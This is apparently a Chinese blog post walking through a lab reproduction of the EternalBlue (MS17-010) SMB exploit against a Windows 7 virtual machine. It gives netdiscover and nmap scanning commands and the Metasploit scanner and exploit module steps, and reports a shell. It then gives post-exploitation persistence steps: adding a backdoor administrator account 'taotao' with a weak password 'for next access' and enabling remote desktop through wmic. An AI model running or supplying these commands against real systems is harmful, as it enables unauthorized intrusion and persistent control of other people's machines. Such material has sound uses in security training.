永恒之蓝(445端口)完整利用过程

     前几天有一次比赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料方面花费了很多时间,就想着写篇博客记录一下。

前置环境:

​ kali,win7虚拟机,msf(kali自带)

一 · 扫描网络中存活主机

使用命令:

netdiscover -i eth0 -r 192.168.1.1/24

永恒之蓝漏洞(445端口)详细利用过程

PS:由于这里使用的是虚拟机,所以网卡显示为 VMware

二 · 扫描当前主机存活端口

使用命令:

nmap -sV -n 192.168.1.1

永恒之蓝漏洞(445端口)详细利用过程

三 · 开启MSF并利用搜索并检测是否能利用永恒之蓝

开启MSF:

msfconsole

永恒之蓝漏洞(445端口)详细利用过程

检测永恒之蓝是否能利用 :

search ms17-010

永恒之蓝漏洞(445端口)详细利用过程

use auxiliary/scanner/smb/smb_ms17_010

永恒之蓝漏洞(445端口)详细利用过程

set RHOST 192.168.1.2

永恒之蓝漏洞(445端口)详细利用过程

经过检测可以发现永恒之蓝漏洞可以利用

永恒之蓝漏洞(445端口)详细利用过程

四 · 利用永恒之蓝漏洞

use exploit/windows/smb/ms17_010_eternalblue

永恒之蓝漏洞(445端口)详细利用过程

剩下的命令不再做文本解释
永恒之蓝漏洞(445端口)详细利用过程
永恒之蓝漏洞(445端口)详细利用过程

成功获得shell

永恒之蓝漏洞(445端口)详细利用过程

=================================================================

so,获得shell之后应该做什么呢???

新建一个用户,以便下次访问。并将该用户升为管理员权限,这样就可以拥有更大的权限了

新建用户并添加到管理员中

net user taotao 123 /add
net localgroup administrators taotao /add

查看是否成功操作

net user 查看本地用户列表
net localgroup administrators

但是光有shell权限太不方便了,再开启一个3389方便远程连接

远程连接之前需要判断对方用户在不在线

开启远程桌面服务

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

相关文章: